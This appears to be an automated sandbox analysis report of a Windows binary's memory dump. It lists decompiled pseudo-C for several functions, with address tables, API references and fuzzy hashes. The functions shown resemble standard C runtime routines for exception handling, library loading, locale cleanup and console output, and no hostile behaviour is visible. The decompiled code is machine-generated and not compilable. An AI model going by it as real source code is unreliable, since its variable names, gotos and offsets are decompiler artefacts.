    • Instruction ID: 610671f54b1dcd6a509fe207883d75cf8ab8c4cbdb7b89e9e5f662dfc29f99fe
    • Opcode Fuzzy Hash: 3cb0dc65df8302449e1de9be8cf0cfc2fcabe0a3b6cbca0d7a3b93675ec5466c
    • Instruction Fuzzy Hash: 09219476900549AFCB42EFA4C880DDE7BB9FF19340F0141A6B695DB120EB31EB44CB84
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E01072910(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v5;
    				signed int _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v32;
    				intOrPtr _v40;
    				void* __ebp;
    				char _t53;
    				signed int _t60;
    				intOrPtr _t61;
    				void* _t62;
    				intOrPtr* _t63;
    				intOrPtr _t65;
    				intOrPtr _t67;
    				intOrPtr _t70;
    				intOrPtr* _t74;
    				intOrPtr _t75;
    				intOrPtr _t77;
    				signed int _t80;
    				char _t82;
    				intOrPtr _t93;
    				intOrPtr _t96;
    				intOrPtr* _t98;
    				void* _t102;
    				void* _t103;
    				void* _t110;
    
    				_t89 = __edx;
    				_t74 = _a4;
    				_push(__edi);
    				_v5 = 0;
    				_v16 = 1;
    				 *_t74 = E0107C367(__ecx,  *_t74);
    				_t75 = _a8;
    				_t6 = _t75 + 0x10; // 0x11
    				_t96 = _t6;
    				_v20 = _t96;
    				_v12 =  *(_t75 + 8) ^  *0x108300c;
    				E010728D0(__edx, __edi, _t96,  *(_t75 + 8) ^  *0x108300c, _t96);
    				E01072BCC(_a12);
    				_t53 = _a4;
    				_t103 = _t102 + 0x10;
    				_t93 =  *((intOrPtr*)(_t75 + 0xc));
    				if(( *(_t53 + 4) & 0x00000066) != 0) {
    					__eflags = _t93 - 0xfffffffe;
    					if(_t93 != 0xfffffffe) {
    						_t89 = 0xfffffffe;
    						E01072DEC(_t75, 0xfffffffe, _t96, 0x108300c);
    						goto L13;
    					}
    					goto L14;
    				} else {
    					_v32 = _t53;
    					_v28 = _a12;
    					 *((intOrPtr*)(_t75 - 4)) =  &_v32;
    					if(_t93 == 0xfffffffe) {
    						L14:
    						return _v16;
    					} else {
    						do {
    							_t80 = _v12;
    							_t60 = _t93 + (_t93 + 2) * 2;
    							_t77 =  *((intOrPtr*)(_t80 + _t60 * 4));
    							_t61 = _t80 + _t60 * 4;
    							_t81 =  *((intOrPtr*)(_t61 + 4));
    							_v24 = _t61;
    							if( *((intOrPtr*)(_t61 + 4)) == 0) {
    								_t82 = _v5;
    								goto L7;
    							} else {
    								_t89 = _t96;
    								_t62 = E01072D9C(_t81, _t96);
    								_t82 = 1;
    								_v5 = 1;
    								_t110 = _t62;
    								if(_t110 < 0) {
    									_v16 = 0;
    									L13:
    									E010728D0(_t89, _t93, _t96, _v12, _t96);
    									goto L14;
    								} else {
    									if(_t110 > 0) {
    										_t63 = _a4;
    										__eflags =  *_t63 - 0xe06d7363;
    										if( *_t63 == 0xe06d7363) {
    											__eflags =  *0x107d308;
    											if(__eflags != 0) {
    												_t70 = E0107BB00(__eflags, 0x107d308);
    												_t103 = _t103 + 4;
    												__eflags = _t70;
    												if(_t70 != 0) {
    													_t98 =  *0x107d308; // 0x107209f
    													 *0x107d170(_a4, 1);
    													 *_t98();
    													_t96 = _v20;
    													_t103 = _t103 + 8;
    												}
    												_t63 = _a4;
    											}
    										}
    										_t90 = _t63;
    										E01072DD0(_t63, _a8, _t63);
    										_t65 = _a8;
    										__eflags =  *((intOrPtr*)(_t65 + 0xc)) - _t93;
    										if( *((intOrPtr*)(_t65 + 0xc)) != _t93) {
    											_t90 = _t93;
    											E01072DEC(_t65, _t93, _t96, 0x108300c);
    											_t65 = _a8;
    										}
    										 *((intOrPtr*)(_t65 + 0xc)) = _t77;
    										E010728D0(_t90, _t93, _t96, _v16, _t96);
    										E01072DB4();
    										asm("int3");
    										_t67 = _v40;
    										__eflags = _t67;
    										if(_t67 != 0) {
    											__eflags = _t67 - 0x1083c6c;
    											if(_t67 != 0x1083c6c) {
    												return E010736D4(_t67);
    											}
    										}
    										return _t67;
    									} else {
    										goto L7;
    									}
    								}
    							}
    							goto L26;
    							L7:
    							_t93 = _t77;
    						} while (_t77 != 0xfffffffe);
    						if(_t82 != 0) {
    							goto L13;
    						}
    						goto L14;
    					}
    				}
    				L26:
    			}































    0x01072910
    0x01072917
    0x0107291b
    0x0107291c
    0x01072922
    0x0107292e
    0x01072930
    0x01072936
    0x01072936
    0x01072941
    0x01072944
    0x01072947
    0x0107294f
    0x01072954
    0x01072957
    0x0107295a
    0x01072961
    0x010729bd
    0x010729c0
    0x010729c8
    0x010729cf
    0x00000000
    0x010729cf
    0x00000000
    0x01072963
    0x01072963
    0x01072969
    0x0107296f
    0x01072975
    0x010729e0
    0x010729e9
    0x01072977
    0x01072977
    0x01072977
    0x0107297d
    0x01072980
    0x01072983
    0x01072986
    0x01072989
    0x0107298e
    0x010729a4
    0x00000000
    0x01072990
    0x01072990
    0x01072992
    0x01072997
    0x01072999
    0x0107299c
    0x0107299e
    0x010729b4
    0x010729d4
    0x010729d8
    0x00000000
    0x010729a0
    0x010729a0
    0x010729ea
    0x010729ed
    0x010729f3
    0x010729f5
    0x010729fc
    0x01072a03
    0x01072a08
    0x01072a0b
    0x01072a0d
    0x01072a0f
    0x01072a1c
    0x01072a22
    0x01072a24
    0x01072a27
    0x01072a27
    0x01072a2a
    0x01072a2a
    0x010729fc
    0x01072a30
    0x01072a32
    0x01072a37
    0x01072a3a
    0x01072a3d
    0x01072a45
    0x01072a49
    0x01072a4e
    0x01072a4e
    0x01072a55
    0x01072a58
    0x01072a68
    0x01072a6d
    0x01072a71
    0x01072a74
    0x01072a76
    0x01072a78
    0x01072a7d
    0x00000000
    0x01072a85
    0x01072a7d
    0x01072a87
    0x010729a2
    0x00000000
    0x010729a2
    0x010729a0
    0x0107299e
    0x00000000
    0x010729a7
    0x010729a7
    0x010729a9
    0x010729b0
    0x00000000
    0x010729b2
    0x00000000
    0x010729b0
    0x01072975
    0x00000000

    APIs
    • _ValidateLocalCookies.LIBCMT ref: 01072947
    • ___except_validate_context_record.LIBVCRUNTIME ref: 0107294F
    • _ValidateLocalCookies.LIBCMT ref: 010729D8
    • __IsNonwritableInCurrentImage.LIBCMT ref: 01072A03
    • _ValidateLocalCookies.LIBCMT ref: 01072A58
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 1170836740-1018135373
    • Opcode ID: 5efde259dd72071ce7dffd745e5ee110d7872ec38d9463ba360ce03593d0ec9f
    • Instruction ID: 0c225943c277b5b1ffd99f7f5228ec2b027a683d99aa4dda75c0837632f24155
    • Opcode Fuzzy Hash: 5efde259dd72071ce7dffd745e5ee110d7872ec38d9463ba360ce03593d0ec9f
    • Instruction Fuzzy Hash: 4A419030E00209ABCF10EF68C884AAEBFF5FF54364F188095E994AB352D731D941CB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E01076470(void* __ecx, signed int* _a4, intOrPtr _a8) {
    				signed int* _v8;
    				void** _t12;
    				void* _t16;
    				void* _t18;
    				signed int _t22;
    				WCHAR* _t23;
    				void** _t26;
    				signed int* _t29;
    				void* _t32;
    				void* _t34;
    
    				_t29 = _a4;
    				while(_t29 != _a8) {
    					_t22 =  *_t29;
    					_t12 = 0x10840f0 + _t22 * 4;
    					_t32 =  *_t12;
    					_v8 = _t12;
    					if(_t32 == 0) {
    						_t23 =  *(0x107e0b8 + _t22 * 4);
    						_t32 = LoadLibraryExW(_t23, 0, 0x800);
    						if(_t32 != 0) {
    							L12:
    							_t26 = _v8;
    							 *_t26 = _t32;
    							if( *_t26 != 0) {
    								FreeLibrary(_t32);
    							}
    							L14:
    							if(_t32 != 0) {
    								_t16 = _t32;
    								L18:
    								return _t16;
    							}
    							L15:
    							_t29 =  &(_t29[1]);
    							continue;
    						}
    						_t18 = GetLastError();
    						if(_t18 != 0x57) {
    							L9:
    							_t32 = 0;
    							L10:
    							if(_t32 != 0) {
    								goto L12;
    							}
    							 *_v8 = _t18 | 0xffffffff;
    							goto L15;
    						}
    						_t18 = E01074D38(_t23, L"api-ms-", 7);
    						_t34 = _t34 + 0xc;
    						if(_t18 == 0) {
    							goto L9;
    						}
    						_t18 = E01074D38(_t23, L"ext-ms-", 7);
    						_t34 = _t34 + 0xc;
    						if(_t18 == 0) {
    							goto L9;
    						}
    						_t18 = LoadLibraryExW(_t23, _t32, _t32);
    						_t32 = _t18;
    						goto L10;
    					}
    					if(_t32 == 0xffffffff) {
    						goto L15;
    					}
    					goto L14;
    				}
    				_t16 = 0;
    				goto L18;
    			}













    0x01076479
    0x01076523
    0x01076481
    0x01076483
    0x0107648a
    0x0107648c
    0x01076492
    0x0107649f
    0x010764b4
    0x010764b8
    0x0107650a
    0x0107650a
    0x0107650f
    0x01076513
    0x01076516
    0x01076516
    0x0107651c
    0x0107651e
    0x01076533
    0x0107652e
    0x01076532
    0x01076532
    0x01076520
    0x01076520
    0x00000000
    0x01076520
    0x010764ba
    0x010764c3
    0x010764fa
    0x010764fa
    0x010764fc
    0x010764fe
    0x00000000
    0x00000000
    0x01076506
    0x00000000
    0x01076506
    0x010764cd
    0x010764d2
    0x010764d7
    0x00000000
    0x00000000
    0x010764e1
    0x010764e6
    0x010764eb
    0x00000000
    0x00000000
    0x010764f0
    0x010764f6
    0x00000000
    0x010764f6
    0x01076497
    0x00000000
    0x00000000
    0x00000000
    0x0107649d
    0x0107652c
    0x00000000

    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: api-ms-$ext-ms-
    • API String ID: 0-537541572
    • Opcode ID: e5dfcfa9fec51391754760db8ee5a5a205d0a3309ce2a0cee1118346fe0883fc
    • Instruction ID: 64b92e35922911c528709bdb8866c108d31d454ea40a3537b702d438e8f08861
    • Opcode Fuzzy Hash: e5dfcfa9fec51391754760db8ee5a5a205d0a3309ce2a0cee1118346fe0883fc
    • Instruction Fuzzy Hash: A7210B71E01611ABFB3296689C40B5E3B98AF017A0F150560FDC7B7185EA33DC008BE8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E010776C7(intOrPtr _a4) {
    				void* _t18;
    
    				_t45 = _a4;
    				if(_a4 != 0) {
    					E0107768F(_t45, 7);
    					E0107768F(_t45 + 0x1c, 7);
    					E0107768F(_t45 + 0x38, 0xc);
    					E0107768F(_t45 + 0x68, 0xc);
    					E0107768F(_t45 + 0x98, 2);
    					E01074D72( *((intOrPtr*)(_t45 + 0xa0)));
    					E01074D72( *((intOrPtr*)(_t45 + 0xa4)));
    					E01074D72( *((intOrPtr*)(_t45 + 0xa8)));
    					E0107768F(_t45 + 0xb4, 7);
    					E0107768F(_t45 + 0xd0, 7);
    					E0107768F(_t45 + 0xec, 0xc);
    					E0107768F(_t45 + 0x11c, 0xc);
    					E0107768F(_t45 + 0x14c, 2);
    					E01074D72( *((intOrPtr*)(_t45 + 0x154)));
    					E01074D72( *((intOrPtr*)(_t45 + 0x158)));
    					E01074D72( *((intOrPtr*)(_t45 + 0x15c)));
    					return E01074D72( *((intOrPtr*)(_t45 + 0x160)));
    				}
    				return _t18;
    			}




    0x010776cd
    0x010776d2
    0x010776db
    0x010776e6
    0x010776f1
    0x010776fc
    0x0107770a
    0x01077715
    0x01077720
    0x0107772b
    0x01077739
    0x01077747
    0x01077758
    0x01077766
    0x01077774
    0x0107777f
    0x0107778a
    0x01077795
    0x00000000
    0x010777a5
    0x010777aa

    APIs
      • Part of subcall function 0107768F: _free.LIBCMT ref: 010776B4
    • _free.LIBCMT ref: 01077715
      • Part of subcall function 01074D72: HeapFree.KERNEL32(00000000,00000000,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?), ref: 01074D88
      • Part of subcall function 01074D72: GetLastError.KERNEL32(?,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?,?), ref: 01074D9A
    • _free.LIBCMT ref: 01077720
    • _free.LIBCMT ref: 0107772B
    • _free.LIBCMT ref: 0107777F
    • _free.LIBCMT ref: 0107778A
    • _free.LIBCMT ref: 01077795
    • _free.LIBCMT ref: 010777A0
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: b70f8fe2e3e57d9ce416f35a547a0632654724d11a49428304fbecbc8e1b03b0
    • Instruction ID: 9992ae9a883ebe143c1936abdf8e6b73f2a54aa21e52299521ae67d62ca18d0f
    • Opcode Fuzzy Hash: b70f8fe2e3e57d9ce416f35a547a0632654724d11a49428304fbecbc8e1b03b0
    • Instruction Fuzzy Hash: F5119071D40B05BBD631BBB4CC09FDB779CAF28780F414824A3D9A6050EB34B9448759
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E01078BFD(void* __ebx, void* __eflags, intOrPtr _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
    				signed int _v8;
    				char _v16;
    				char _v23;
    				char _v24;
    				void _v32;
    				signed int _v33;
    				long _v40;
    				signed char _v44;
    				char _v47;
    				void _v48;
    				intOrPtr _v52;
    				long _v56;
    				char _v60;
    				intOrPtr _v68;
    				char _v72;
    				struct _OVERLAPPED* _v76;
    				signed char _v80;
    				signed char _v84;
    				intOrPtr _v88;
    				signed int _v92;
    				char _v96;
    				long _v100;
    				intOrPtr _v104;
    				intOrPtr _v108;
    				signed char _v112;
    				void* _v116;
    				char _v120;
    				int _v124;
    				intOrPtr _v128;
    				struct _OVERLAPPED* _v132;
    				struct _OVERLAPPED* _v136;
    				struct _OVERLAPPED* _v140;
    				struct _OVERLAPPED* _v144;
    				void* __edi;
    				void* __esi;
    				signed int _t172;
    				signed int _t174;
    				int _t178;
    				intOrPtr _t183;
    				intOrPtr _t186;
    				void* _t188;
    				void* _t190;
    				long _t193;
    				void _t198;
    				long _t202;
    				void* _t206;
    				intOrPtr _t212;
    				signed char* _t213;
    				char _t216;
    				signed int _t219;
    				char* _t220;
    				void* _t222;
    				long _t228;
    				intOrPtr _t229;
    				char _t231;
    				signed char _t235;
    				struct _OVERLAPPED* _t243;
    				signed int _t246;
    				intOrPtr _t249;
    				signed char _t252;
    				signed int _t253;
    				signed char _t255;
    				struct _OVERLAPPED* _t256;
    				intOrPtr _t258;
    				void* _t262;
    				signed char _t263;
    				void* _t264;
    				void* _t266;
    				long _t268;
    				signed int _t271;
    				long _t272;
    				struct _OVERLAPPED* _t273;
    				signed int _t274;
    				intOrPtr _t276;
    				signed int _t278;
    				signed int _t281;
    				long _t282;
    				long _t283;
    				signed char _t284;
    				intOrPtr _t285;
    				signed int _t286;
    				void* _t287;
    				void* _t288;
    
    				_t172 =  *0x108300c; // 0x98fa3f37
    				_v8 = _t172 ^ _t286;
    				_t174 = _a8;
    				_t263 = _a12;
    				_t274 = (_t174 & 0x0000003f) * 0x38;
    				_t246 = _t174 >> 6;
    				_v112 = _t263;
    				_v84 = _t246;
    				_v80 = _t274;
    				_t276 = _a16 + _t263;
    				_v116 =  *((intOrPtr*)(_t274 +  *((intOrPtr*)(0x10841d0 + _t246 * 4)) + 0x18));
    				_v104 = _t276;
    				_t178 = GetConsoleCP();
    				_t243 = 0;
    				_v124 = _t178;
    				E01074C38( &_v72, _t263, 0);
    				asm("stosd");
    				_t249 =  *((intOrPtr*)(_v68 + 8));
    				_v128 = _t249;
    				asm("stosd");
    				asm("stosd");
    				_t268 = _v112;
    				_v40 = _t268;
    				if(_t268 >= _t276) {
    					L52:
    					__eflags = _v60 - _t243;
    				} else {
    					_t278 = _v92;
    					while(1) {
    						_v47 =  *_t268;
    						_v76 = _t243;
    						_v44 = 1;
    						_t186 =  *((intOrPtr*)(0x10841d0 + _v84 * 4));
    						_v52 = _t186;
    						if(_t249 != 0xfde9) {
    							goto L23;
    						}
    						_t263 = _v80;
    						_t212 = _t186 + 0x2e + _t263;
    						_t256 = _t243;
    						_v108 = _t212;
    						while( *((intOrPtr*)(_t212 + _t256)) != _t243) {
    							_t256 =  &(_t256->Internal);
    							if(_t256 < 5) {
    								continue;
    							}
    							break;
    						}
    						_t213 = _v40;
    						_t271 = _v104 - _t213;
    						_v44 = _t256;
    						if(_t256 <= 0) {
    							_t258 =  *((char*)(( *_t213 & 0x000000ff) + 0x1083768)) + 1;
    							_v52 = _t258;
    							__eflags = _t258 - _t271;
    							if(_t258 > _t271) {
    								__eflags = _t271;
    								if(_t271 <= 0) {
    									goto L44;
    								} else {
    									_t282 = _v40;
    									do {
    										_t264 = _t243 + _t263;
    										_t216 =  *((intOrPtr*)(_t243 + _t282));
    										_t243 =  &(_t243->Internal);
    										 *((char*)(_t264 +  *((intOrPtr*)(0x10841d0 + _v84 * 4)) + 0x2e)) = _t216;
    										_t263 = _v80;
    										__eflags = _t243 - _t271;
    									} while (_t243 < _t271);
    									goto L43;
    								}
    							} else {
    								_t272 = _v40;
    								__eflags = _t258 - 4;
    								_v144 = _t243;
    								_t260 =  &_v144;
    								_v140 = _t243;
    								_v56 = _t272;
    								_t219 = (0 | _t258 == 0x00000004) + 1;
    								__eflags = _t219;
    								_push( &_v144);
    								_v44 = _t219;
    								_push(_t219);
    								_t220 =  &_v56;
    								goto L21;
    							}
    						} else {
    							_t228 =  *((char*)(( *(_t263 + _v52 + 0x2e) & 0x000000ff) + 0x1083768)) + 1;
    							_v56 = _t228;
    							_t229 = _t228 - _t256;
    							_v52 = _t229;
    							if(_t229 > _t271) {
    								__eflags = _t271;
    								if(_t271 > 0) {
    									_t283 = _v40;
    									do {
    										_t266 = _t243 + _t263 + _t256;
    										_t231 =  *((intOrPtr*)(_t243 + _t283));
    										_t243 =  &(_t243->Internal);
    										 *((char*)(_t266 +  *((intOrPtr*)(0x10841d0 + _v84 * 4)) + 0x2e)) = _t231;
    										_t256 = _v44;
    										_t263 = _v80;
    										__eflags = _t243 - _t271;
    									} while (_t243 < _t271);
    									L43:
    									_t278 = _v92;
    								}
    								L44:
    								_t281 = _t278 + _t271;
    								__eflags = _t281;
    								L45:
    								__eflags = _v60;
    								_v92 = _t281;
    							} else {
    								_t263 = _t243;
    								if(_t256 > 0) {
    									_t285 = _v108;
    									do {
    										 *((char*)(_t286 + _t263 - 0xc)) =  *((intOrPtr*)(_t285 + _t263));
    										_t263 = _t263 + 1;
    									} while (_t263 < _t256);
    									_t229 = _v52;
    								}
    								_t272 = _v40;
    								if(_t229 > 0) {
    									E01073160( &_v16 + _t256, _t272, _v52);
    									_t256 = _v44;
    									_t287 = _t287 + 0xc;
    								}
    								if(_t256 > 0) {
    									_t263 = _v44;
    									_t273 = _t243;
    									_t284 = _v80;
    									do {
    										_t262 = _t273 + _t284;
    										_t273 =  &(_t273->Internal);
    										 *(_t262 +  *((intOrPtr*)(0x10841d0 + _v84 * 4)) + 0x2e) = _t243;
    									} while (_t273 < _t263);
    									_t272 = _v40;
    								}
    								_v136 = _t243;
    								_v120 =  &_v16;
    								_t260 =  &_v136;
    								_v132 = _t243;
    								_push( &_v136);
    								_t235 = (0 | _v56 == 0x00000004) + 1;
    								_v44 = _t235;
    								_push(_t235);
    								_t220 =  &_v120;
    								L21:
    								_push(_t220);
    								_push( &_v76);
    								_t222 = E010799A4(_t260);
    								_t288 = _t287 + 0x10;
    								if(_t222 == 0xffffffff) {
    									goto L52;
    								} else {
    									_t268 = _t272 + _v52 - 1;
    									L31:
    									_t268 = _t268 + 1;
    									_v40 = _t268;
    									_t193 = E01076308(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
    									_t287 = _t288 + 0x20;
    									_v56 = _t193;
    									if(_t193 == 0) {
    										goto L52;
    									} else {
    										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
    											L51:
    											_v96 = GetLastError();
    											goto L52;
    										} else {
    											_t278 = _v88 - _v112 + _t268;
    											_v92 = _t278;
    											if(_v100 < _v56) {
    												goto L52;
    											} else {
    												if(_v47 != 0xa) {
    													L38:
    													if(_t268 >= _v104) {
    														goto L52;
    													} else {
    														_t249 = _v128;
    														continue;
    													}
    												} else {
    													_t198 = 0xd;
    													_v48 = _t198;
    													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
    														goto L51;
    													} else {
    														if(_v100 < 1) {
    															goto L52;
    														} else {
    															_v88 = _v88 + 1;
    															_t278 = _t278 + 1;
    															_v92 = _t278;
    															goto L38;
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    						goto L53;
    						L23:
    						_t252 = _v80;
    						_t263 =  *((intOrPtr*)(_t252 + _t186 + 0x2d));
    						__eflags = _t263 & 0x00000004;
    						if((_t263 & 0x00000004) == 0) {
    							_v33 =  *_t268;
    							_t188 = E010777AB(_t263);
    							_t253 = _v33 & 0x000000ff;
    							__eflags =  *((intOrPtr*)(_t188 + _t253 * 2)) - _t243;
    							if( *((intOrPtr*)(_t188 + _t253 * 2)) >= _t243) {
    								_push(1);
    								_push(_t268);
    								goto L30;
    							} else {
    								_t202 = _t268 + 1;
    								_v56 = _t202;
    								__eflags = _t202 - _v104;
    								if(_t202 >= _v104) {
    									_t263 = _v84;
    									_t255 = _v80;
    									 *((char*)(_t255 +  *((intOrPtr*)(0x10841d0 + _t263 * 4)) + 0x2e)) = _v33;
    									 *(_t255 +  *((intOrPtr*)(0x10841d0 + _t263 * 4)) + 0x2d) =  *(_t255 +  *((intOrPtr*)(0x10841d0 + _t263 * 4)) + 0x2d) | 0x00000004;
    									_t281 = _t278 + 1;
    									goto L45;
    								} else {
    									_t206 = E010782B0( &_v76, _t268, 2);
    									_t288 = _t287 + 0xc;
    									__eflags = _t206 - 0xffffffff;
    									if(_t206 == 0xffffffff) {
    										goto L52;
    									} else {
    										_t268 = _v56;
    										goto L31;
    									}
    								}
    							}
    						} else {
    							_t263 = _t263 & 0x000000fb;
    							_v24 =  *((intOrPtr*)(_t252 + _t186 + 0x2e));
    							_v23 =  *_t268;
    							_push(2);
    							 *(_t252 + _v52 + 0x2d) = _t263;
    							_push( &_v24);
    							L30:
    							_push( &_v76);
    							_t190 = E010782B0();
    							_t288 = _t287 + 0xc;
    							__eflags = _t190 - 0xffffffff;
    							if(_t190 == 0xffffffff) {
    								goto L52;
    							} else {
    								goto L31;
    							}
    						}
    						goto L53;
    					}
    				}
    				L53:
    				if(__eflags != 0) {
    					_t183 = _v72;
    					_t167 = _t183 + 0x350;
    					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
    					__eflags =  *_t167;
    				}
    				__eflags = _v8 ^ _t286;
    				asm("movsd");
    				asm("movsd");
    				asm("movsd");
    				return E01071463(_v8 ^ _t286, _t263, _a4,  &_v96);
    			}






















































































    0x01078c08
    0x01078c0f
    0x01078c12
    0x01078c17
    0x01078c1f
    0x01078c22
    0x01078c26
    0x01078c29
    0x01078c33
    0x01078c3d
    0x01078c3f
    0x01078c42
    0x01078c45
    0x01078c4b
    0x01078c4d
    0x01078c54
    0x01078c61
    0x01078c62
    0x01078c65
    0x01078c68
    0x01078c69
    0x01078c6a
    0x01078c6d
    0x01078c72
    0x01078f7e
    0x01078f7e
    0x01078c78
    0x01078c78
    0x01078c7b
    0x01078c7d
    0x01078c83
    0x01078c86
    0x01078c8d
    0x01078c94
    0x01078c9d
    0x00000000
    0x00000000
    0x01078ca3
    0x01078ca9
    0x01078cab
    0x01078cad
    0x01078cb0
    0x01078cb5
    0x01078cb9
    0x00000000
    0x00000000
    0x00000000
    0x01078cb9
    0x01078cbe
    0x01078cc1
    0x01078cc3
    0x01078cc8
    0x01078d7a
    0x01078d7b
    0x01078d7e
    0x01078d80
    0x01078f2e
    0x01078f30
    0x00000000
    0x01078f32
    0x01078f32
    0x01078f35
    0x01078f38
    0x01078f41
    0x01078f44
    0x01078f45
    0x01078f49
    0x01078f4c
    0x01078f4c
    0x00000000
    0x01078f50
    0x01078d86
    0x01078d86
    0x01078d8b
    0x01078d8e
    0x01078d94
    0x01078d9a
    0x01078da3
    0x01078da6
    0x01078da6
    0x01078da7
    0x01078da8
    0x01078dab
    0x01078dac
    0x00000000
    0x01078dac
    0x01078cce
    0x01078cdd
    0x01078cde
    0x01078ce1
    0x01078ce3
    0x01078ce8
    0x01078ef9
    0x01078efb
    0x01078efd
    0x01078f00
    0x01078f05
    0x01078f0e
    0x01078f11
    0x01078f12
    0x01078f16
    0x01078f19
    0x01078f1c
    0x01078f1c
    0x01078f20
    0x01078f20
    0x01078f20
    0x01078f23
    0x01078f23
    0x01078f23
    0x01078f25
    0x01078f25
    0x01078f29
    0x01078cee
    0x01078cee
    0x01078cf2
    0x01078cf4
    0x01078cf7
    0x01078cfa
    0x01078cfe
    0x01078cff
    0x01078d03
    0x01078d03
    0x01078d06
    0x01078d0b
    0x01078d17
    0x01078d1c
    0x01078d1f
    0x01078d1f
    0x01078d24
    0x01078d26
    0x01078d29
    0x01078d2b
    0x01078d2e
    0x01078d31
    0x01078d34
    0x01078d3c
    0x01078d40
    0x01078d44
    0x01078d44
    0x01078d4a
    0x01078d50
    0x01078d53
    0x01078d5b
    0x01078d62
    0x01078d66
    0x01078d67
    0x01078d6a
    0x01078d6b
    0x01078daf
    0x01078daf
    0x01078db3
    0x01078db4
    0x01078db9
    0x01078dbf
    0x00000000
    0x01078dc5
    0x01078dc9
    0x01078e52
    0x01078e59
    0x01078e61
    0x01078e69
    0x01078e6e
    0x01078e71
    0x01078e76
    0x00000000
    0x01078e7c
    0x01078e91
    0x01078f75
    0x01078f7b
    0x00000000
    0x01078e97
    0x01078ea0
    0x01078ea2
    0x01078ea8
    0x00000000
    0x01078eae
    0x01078eb2
    0x01078ee8
    0x01078eeb
    0x00000000
    0x01078ef1
    0x01078ef1
    0x00000000
    0x01078ef1
    0x01078eb4
    0x01078eb6
    0x01078eb8
    0x01078ed1
    0x00000000
    0x01078ed7
    0x01078edb
    0x00000000
    0x01078ee1
    0x01078ee1
    0x01078ee4
    0x01078ee5
    0x00000000
    0x01078ee5
    0x01078edb
    0x01078ed1
    0x01078eb2
    0x01078ea8
    0x01078e91
    0x01078e76
    0x01078dbf
    0x01078ce8
    0x00000000
    0x01078dd0
    0x01078dd0
    0x01078dd3
    0x01078dd7
    0x01078dda
    0x01078dfc
    0x01078dff
    0x01078e04
    0x01078e08
    0x01078e0c
    0x01078e3a
    0x01078e3c
    0x00000000
    0x01078e0e
    0x01078e0e
    0x01078e11
    0x01078e14
    0x01078e17
    0x01078f52
    0x01078f55
    0x01078f62
    0x01078f6d
    0x01078f72
    0x00000000
    0x01078e1d
    0x01078e24
    0x01078e29
    0x01078e2c
    0x01078e2f
    0x00000000
    0x01078e35
    0x01078e35
    0x00000000
    0x01078e35
    0x01078e2f
    0x01078e17
    0x01078ddc
    0x01078de0
    0x01078de3
    0x01078de8
    0x01078dee
    0x01078df0
    0x01078df7
    0x01078e3d
    0x01078e40
    0x01078e41
    0x01078e46
    0x01078e49
    0x01078e4c
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x01078e4c
    0x00000000
    0x01078dda
    0x01078c7b
    0x01078f81
    0x01078f81
    0x01078f83
    0x01078f86
    0x01078f86
    0x01078f86
    0x01078f86
    0x01078f98
    0x01078f9a
    0x01078f9b
    0x01078f9c
    0x01078fa6

    APIs
    • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 01078C45
    • __fassign.LIBCMT ref: 01078E24
    • __fassign.LIBCMT ref: 01078E41
    • WriteFile.KERNEL32(?,01076EFA,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01078E89
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 01078EC9
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 01078F75
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
